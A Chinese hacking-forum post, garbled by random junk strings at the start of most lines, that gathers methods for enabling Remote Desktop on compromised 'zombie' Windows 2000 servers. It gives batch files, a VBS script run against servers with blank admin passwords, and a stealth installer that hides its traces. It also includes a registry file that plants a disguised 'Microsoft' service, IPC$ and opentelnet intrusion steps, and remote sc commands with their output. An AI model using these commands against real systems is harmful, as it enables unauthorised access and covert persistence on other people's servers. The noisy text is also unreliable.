[hide=60] 1.打开记事本,编辑内容如下:
?PPZp6A3L= echo [Components] > c:\sql
T,JA#Rk|1N echo TSEnable = on >> c:\sql
bb=uF1 sysocmgr /i:c:\winnt\inf\sysoc.inf /u:c:\sql /q
F#+ .>!
编辑好后存为BAT文件,上传至肉鸡,执行。这里值得注意的是要确定winnt是否在c盘,如果在其他盘则需要改动。
Ey&aBYR 84&XW 2 (对xp\2000都有效) 脚本文件 本地开3389 工具:rots1.05
~y0R'oi 地址:
www.netsill.com/rots.zip uL?vG6% ^1 使用方法:
7]22"mc 在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:
d @rs3Q1z t"s5\;IJ c:\>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [自动重起选项]
UU@fkk 8}BB OD 服务端口: 设置终端服务的服务端口。默认是3389。
PoD^`()FR{ 自动重起选项: 使用/r表示安装完成后自动重起目标使设置生效。
'=cKU0
G # 使用/fr表示强制重起目标。(如果/r不行,可以允哉飧觯?BR>使用此参数时,端口设置不能忽略。
X,v4d~>] 比如扫描到了一个有NT弱口令的服务器,IP地址是222.222.222.222,管理员帐户是administrator,密码为空
msk/p>{O 运行CMD(2000下的DOS),我们给它开终端!
$->d! 命令如下!
Q1tpCT cscript reg.vbe 222.222.222.222 administrator "" 3389 /fr
6/mF2&&g 上面的命令应该可以理解吧?cscript reg.vbe这是命令,后面的是IP,然后是管理员帐户,接这是密码,因为222.222.222.222 这台服务器的管理员密码是空的,那就用双引号表示为空,再后面是端口,你可以任意设置终端的端口,/fr是重启命令(强制重启,一般我都用这个,你也可以 /r,这是普通重启)
rj H` So4nJ><p 脚本会判断目标系统类型,如果不是server及以上版本,就会提示你是否要取消。
s'_,:R\VM> 因为pro版不能安装终端服务。
i</J @0}y 如果你确信脚本判断错误,就继续安装好了。
'dt\db5p 4Nmea-!* 如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用""表示)。
C9KWa*3 S_8r\B[>P 脚本访问的目标的135端口,如果目标135端口未开放,或者WMI服务关闭,那么脚本就没用了。
=3ADT$YHd LP`CS849z2 b1!@v+ 3,下载3389自动安装程序-djshao正式版5.0
uMFV%+I 地址
www.netsill.com/djshao.zip E8/rZ~0O~ 说明:
ehOs9b 解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyxs.exe上传到肉鸡的c:\winnt\temp下,然后进入c:\ winnt\temp目录执行djxyxs.exe解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡会自动重启!重启后会出现终端服务!
^b53}f8H V_a)jJ 特点:1、不用修改注册表的安装路径,注册表会自动修改,安装完后会自动恢复到原来的安装路径,2、在后台安静模式运行,就算肉鸡旁有人也没有关系!3、在添加和删除中看不出终端服务被安装的痕迹,也就是启动终端前不会打钩,4、不会在肉鸡上留下你的上传文件,在安装完终端服务后会会自动删除你上传到c:\winnt\temp下的任何文件!5、不管肉鸡的winnt装在什么盘上都无所谓!6、安装完终端后会删除在管理工具中的终端快捷图标!7、在没有安装终端前,终端服务是被禁止的!安装终端后,终端服务被改为自动!但是如果在安装前终端服务是手动!安装后就可能还是手动!等重启后就不会打开服务!所以在软件中加了sc指令,等安装完后,不管终端服务是禁止还是手动还是自动,全部改为自动。8、自动检测肉鸡是不是服务器版,如果不是删除原文件,不执行安装,如果是服务器版就执行安装!9、支持非法内容,请删除韩繁四个版本的win2000服务器版!
$3\yf?m}q F=&;Y@t T{S4|G1R6 4.下载DameWare NT Utilities 3.66.0.0 注册版
QB 77:E 地址
www.netsill.com/dwmrcw36600.zip t =dO 安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。
g#W_S? 复制启动后出现对方桌面。
3eg5oAZ)G8 在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入后在启动终端服务上打上勾。确定自动提示重起,重起后OK。
W^xZ+] Zg $Tf |Cf
mcz(56 5.
{j6g@Vd6lx -i_En^Fi 首先我们制作开启3389的工具
IL2r9x% 先把下面的注册表内容copy一份,另存为3389.reg注册表文件
lfy7w| 注册表内容:
|< N frz Windows Registry Editor Version 5.00
NfF~dK| [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache]
elbG\qXBp "Enabled"="0"
d=e{]MG( [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon]
.C5@QKU "ShutdownWithoutLogon"="0"
ac6*v49 [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer]
~Fx&)kegTo "EnableAdminTSRemote"=dword:00000001
xv0M [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
4r*Pa(;y "TSEnabled"=dword:00000001
6ojo##j [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD]
Fp:3#Bh "Start"=dword:00000002
F!~l
MpuE [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle]
)vHi|~( "Hotkey"="1"
*ro.mQ_ [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\SecuService]
3A
R%&:- "Start"=dword:00000002
BLW]|p|1: "ErrorControl"=dword:00000001
]p$zvMf} "ImagePath"=hex(2):25,00,53,00,79,00,73,00,74,00,65,00,6d,00,52,00,6f,00,6f,00,\
z~.9@[LG] 74,00,25,00,5c,00,53,00,79,00,73,00,74,00,65,00,6d,00,33,00,32,00,5c,00,65,\
5<N~3
1z 00,76,00,65,00,6e,00,74,00,6c,00,6f,00,67,00,2e,00,65,00,78,00,65,00,00,00
+k
rFB?>` "ObjectName"="LocalSystem"
T}2:.Hk:N "Type"=dword:00000010
; J2-rh "Description"="Microsoft"
$-w5o`e "DisplayName"="Microsoft"
eU~?p|Np 再把下面的内容保存为批处理文件3389.bat
k5X b}@ 安装批处理内容:
SOI)/u copy termsrv.exe eventlog.exe
(9z|a, regedit.exe /s 3389.reg
^Fp=y,D del 3389.reg
#{w5)|S#JD del 3389.exe
g8Aj `O del 3389.bat
gfV DqDF 用winrar制作成exe自解压缩包
<|V'pim A\C'dZ <N 61.188.***.*** user:administrato pass:空
'bm:u 先使用工具letmein判断其操作系统
IHVMHOq}' letmein \\ip -all -d
yfq>, TsInternetUser (TsInternetUser)这个是2000的终端用户,现在可以判断其为2000server了
kJeu40oN 再使用终端登陆软件看看他的3389是不是已经开启了免了费事折腾
6J;i,/ky 应该没有开启了
qT0_L 建立ipc连接
YZ*{^' copy工具过去
qvTJ>FILT net use \\ip\ipc$ "pass" /user:name
lWlUWhLnP copy file \\ip\admin$\system32
jZ/+~{< 用opentelnet开对方的telnet
X X&K=<,Ja opentelnet \\ip name pass 1 99
m >hovikY* 用telnet进入
R.UumBM 进入到对方的winnt\system32\
uWrFunh% 目录
}s6G!v^2"" 解压缩3389.exe
p5`ZyD]+ 运行安装批处理3389.bat
s*+ZYPk 现在我们把对方重起一下,用reboot
Z~RdFC tGqQJT#mr7 54wM8'+ 4ac1m,Jlt FpC~1Nau 7.
&vkp?UH zP|*(* 检查对方是否真的禁用了Terminal server
lrn+d$!@ C:\>sc \\xxx.xxx.xxx.xxx qc termservice
{]@Qu" M [SC] GetServiceConfig SUCCESS
-3`Isv SERVICE_NAME: termservice
&%}6q]e TYPE : 10 WIN32_OWN_PROCESS
X?kPi&ru START_TYPE : 4 DISABLED
<THUsY`3P& ERROR_CONTROL : 1 NORMAL
xiJz`KD& BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
xcnt?%%M LOAD_ORDER_GROUP :
[>wzl"cHW TAG : 0
4[xA-
\ DISPLAY_NAME : Terminal Services
H-m`Dh5{ DEPENDENCIES :
HIrEv SERVICE_START_NAME : LocalSystem
Hp*gv/0 仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。
`%%?zgY -7,vtd[h B%y! aQep C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto
>eu
`!8 [SC] ChangeServiceConfig SUCCESS
<]c#)xg 好了,现在我们已经把对方终端服务的启动模式修改成自动了。
o6/Rx#A .&L^J&V oX#9RW/ >I -P*xyI 再检查一便对方终端服务的启动模式
-D;lS
6 C:\>sc \\TEST qc termservice
%p}qO^%M [SC] GetServiceConfig SUCCESS
&E`9>&~J SERVICE_NAME: termservice
GP Ix@k TYPE : 10 WIN32_OWN_PROCESS
pB[%:w/@l: START_TYPE : 2 AUTO_START
.oEFX8 ERROR_CONTROL : 1 NORMAL
EuLXtq BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
+=Yk-nJ LOAD_ORDER_GROUP :
GtG&yeB TAG : 0
8 `o{b"l+ DISPLAY_NAME : Terminal Services
C*$|#.l DEPENDENCIES :
V!H(;Tuuo SERVICE_START_NAME : LocalSystem
]}/mFY?7 O<bDU0s{M z,M'Tr.1| n~9 i^ 启动对方的终端服务
nxD'r C:\>sc \\xxx.xxx.xxx.xxx start termservice
tb: SERVICE_NAME: termservice
FBcm;cjH TYPE : 10 WIN32_OWN_PROCESS
M,ppCHy/$ STATE : 2 START_PENDING
BZ2nDW*% (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
l~ CZW*/ WIN32_EXIT_CODE : 0 (0x0)
I>d I[U SERVICE_EXIT_CODE : 0 (0x0)
|z ]aa CHECKPOINT : 0x1
4@ =
aa WAIT_HINT : 0x7530
4VC/-.At Euqjxz `~0P[>|+ C:\>sc \\xxx.xxx.xxx.xxx query termservice
zU=YNrn SERVICE_NAME: termservice
zLo;.X[Y TYPE : 10 WIN32_OWN_PROCESS
KxGKA STATE : 4 RUNNING
m\/>C|f\ (NOT_STOPPABLE,NOT_PAUSABLE,IGNORES_SHUTDOWN)
R9bhC9NP WIN32_EXIT_CODE : 0 (0x0)
<r0.ppgY SERVICE_EXIT_CODE : 0 (0x0)
NYGmLbq CHECKPOINT : 0x0
uSH>$;a WAIT_HINT : 0x0[/hide]